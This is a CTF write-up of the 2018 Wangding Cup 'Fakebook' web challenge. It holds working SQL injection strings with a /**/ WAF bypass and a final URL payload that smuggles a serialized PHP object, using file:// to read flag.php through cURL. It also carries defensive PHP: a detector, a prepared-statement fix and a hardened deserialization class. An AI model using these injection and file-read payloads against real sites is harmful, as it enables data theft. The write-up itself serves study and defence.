[Wangding Cup (网鼎杯) 2018] Fakebook

Published 2021-08-06, 77 views


[screenshot: image-20201117162010730.png]

Open the challenge, register and log in; you land on the page shown above.

[screenshot: image-20201117162057215.png]

Looking at the page source reveals a view.php.

[screenshot: image-20201117162154602.png]

Supplying a single quote produces an error, so SQL injection is likely; the next step is to test it.

view.php?no=1 and 1=1
view.php?no=1 and 1=2
view.php?no=1 order by 5
view.php?no=0 union select 666,777,888,999

The last one triggers the WAF, so try inline comments to obfuscate the keywords and bypass it:

view.php?no=0 /**/union/**/select/**/ 666,777,888,999
view.php?no=0 /**/union/**/select/**/ 666,database(),888,999

Database name: fakebook

view.php?no=0 /**/union/**/select/**/ 1,table_name ,3,4 from information_schema.tables where table_schema='fakebook'

Table name: users

view.php?no=0 /**/union/**/select/**/ 1,column_name,3,4 from information_schema.columns where table_schema=database() and table_name='users'

Column names: no, username, passwd, data

view.php?no=0 /**/union/**/select/**/ 1,data,3,4 from fakebook.users

O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:123;s:4:"blog";s:12:"ww.baidu.com";}

This returns a serialized PHP object.
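The WAF here was beaten by inline comments because it matched the literal keyword sequence rather than the normalised SQL, and because the query was built from the raw `no` parameter in the first place. The following is an added example (it is not the challenge's view.php, which this writeup never shows): a comment-stripping normaliser that shows why `/**/` slipped through, next to the actual fix, which validates `no` as an integer and binds it in a prepared statement. The table and column names follow what the injection recovered above; the DSN, credentials and function names are assumptions.

```php
<?php
// Added example, not the challenge's own code. Shows (1) why a keyword WAF lost to
// "union/**/select" and how normalising input before matching closes that gap, and
// (2) the real fix: integer validation plus a bound parameter, so the value can
// never be parsed as SQL regardless of what a filter does or does not catch.

// Normalise a query-string value the way an attacker's SQL will be read by MySQL:
// URL-decode, drop /* ... */ comments, collapse whitespace, lower-case.
function normalize_sql_input(string $s): string
{
    $s = urldecode($s);
    $s = preg_replace('#/\*.*?\*/#s', ' ', $s);   // inline comments act as separators
    $s = preg_replace('/\s+/', ' ', $s);           // collapse runs of whitespace
    return strtolower(trim($s));
}

// Detection aid only: "0 /**/union/**/select/**/ 1,data,3,4" becomes
// "0 union select 1,data,3,4" and is flagged, unlike with a naive literal match.
function looks_like_sqli(string $s): bool
{
    $n = normalize_sql_input($s);
    return (bool)preg_match('/\b(union\s+select|order\s+by|information_schema)\b/', $n);
}

// The fix: `no` is a row id, so anything that is not a short digit string is
// rejected up front, and the value is bound as an integer in a prepared statement.
// Column list mirrors the schema found above (passwd deliberately not selected).
function fetch_user(PDO $pdo, string $no): ?array
{
    if (!preg_match('/^\d{1,10}$/', $no)) {
        http_response_code(400);
        return null;
    }
    $stmt = $pdo->prepare('SELECT no, username, data FROM users WHERE no = :no');
    $stmt->bindValue(':no', (int)$no, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage (DSN and credentials are placeholders; emulated prepares disabled so the
// server, not the driver, does the binding).
// $pdo = new PDO('mysql:host=127.0.0.1;dbname=fakebook', 'DB_USER', 'DB_PASS',
//                [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// $row = fetch_user($pdo, $_GET['no'] ?? '');
// if (looks_like_sqli($_GET['no'] ?? '')) { error_log('possible SQLi attempt on view.php'); }
```

The normaliser is worth keeping as a logging signal (it is what lets the `/**/` variants above be spotted in access logs), but the prepared statement is what removes the bug: with the parameter bound as `PDO::PARAM_INT`, none of the `union`, `order by` or `information_schema` probes listed above reach the parser as SQL.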

A directory scan with dirsearch turns up nothing.

Check robots.txt (a standard step worth remembering).

[screenshot: image-20201117163636406.png]

Downloading the file it points to gives a copy of the source code:

<?php

class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog) // assign the fields
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url) // custom fetch helper
    {
        // initialise a cURL session
        $ch = curl_init();

        // set the URL and the matching options
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

        // fetch the URL and hand the body back to the caller
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            curl_close($ch); // release the handle on this path as well
            return 404;
        }
        // close the cURL resource and free system resources
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

The plan is now clear: use the deserialization together with a pseudo-protocol (file://) to read flag.php directly.

[screenshot: image-20201117163927077.png]

Combined with the earlier error message, the path can be inferred to be /var/www/html/flag.php.

So write a short PHP script to build the payload:

[screenshot: image-20201117164206072.png]

Since data is the fourth column, the final payload is:

http://b5de29d4-cf0b-47f7-a63d-7edf1fc2a2c4.node3.buuoj.cn/view.php?no=0%20union/**/select%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:5:%22admin%22;s:3:%22age%22;i:123;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27
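The chain works because `get()` hands whatever is in `$this->blog` straight to cURL, and a deserialized object never passes through the constructor, so nothing re-checks the URL between the database and the fetch. The following hardened version of the class is an added example, not the challenge's source: it re-validates the URL on every fetch and on `__wakeup()`, restricts cURL to http/https (including on redirects), and limits `unserialize()` to this one class. The `setBlog`, `isSafeBlogUrl` and `loadUserInfo` names are assumptions introduced for the example.

```php
<?php
// Added hardening example; same class shape as the UserInfo in the writeup, but:
//  - the blog URL is checked at fetch time and after unserialize(), not only at sign-up;
//  - the check parses the scheme instead of trusting an optional "http(s)://" regex prefix;
//  - cURL itself is told it may only speak http/https, also when following redirects;
//  - unserialize() may only produce UserInfo objects.

class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->setBlog($blog);
    }

    public function setBlog($blog)
    {
        if (!self::isSafeBlogUrl($blog)) {
            throw new InvalidArgumentException("blog must be an http(s) URL");
        }
        $this->blog = $blog;
    }

    // Runs after unserialize(): properties were written without the constructor,
    // so a stored object whose blog is "file:///..." is rejected here, not fetched.
    public function __wakeup()
    {
        $this->setBlog($this->blog);
    }

    // Scheme allowlist. The original isValidBlog regex makes "http(s)://" optional and
    // says nothing about what cURL will do with other schemes; parse and insist on http/https.
    public static function isSafeBlogUrl($url)
    {
        if (!is_string($url) || filter_var($url, FILTER_VALIDATE_URL) === false) {
            return false;
        }
        $scheme = strtolower((string)parse_url($url, PHP_URL_SCHEME));
        $host   = parse_url($url, PHP_URL_HOST);
        return in_array($scheme, ['http', 'https'], true) && !empty($host);
    }

    public function get($url)
    {
        if (!self::isSafeBlogUrl($url)) {
            return false;
        }
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        // Second line of defence inside cURL: file://, gopher://, dict:// etc. are refused
        // even if a validation bug lets such a URL through, and a redirect cannot switch to them.
        curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
        curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        return $httpCode == 404 ? 404 : $output;
    }

    public function getBlogContents()
    {
        return $this->get($this->blog);
    }
}

// Loading the stored `data` blob: only UserInfo may be instantiated, and a rejected
// URL from __wakeup() is treated as a bad record instead of a fatal error.
function loadUserInfo($data)
{
    try {
        $obj = unserialize($data, ['allowed_classes' => ['UserInfo']]);
    } catch (InvalidArgumentException $e) {
        return null;
    }
    return $obj instanceof UserInfo ? $obj : null;
}
```

With this in place the serialized blob from the payload above is rejected in `__wakeup()` before `getBlogContents()` ever runs, and a blog value like `ww.baidu.com` (scheme-less, accepted by the original regex) now has to be stored as `http://ww.baidu.com`. Note that this only closes the pseudo-protocol part of the problem: `http://` requests to internal addresses are a separate SSRF concern and need a host or resolved-IP allowlist on top.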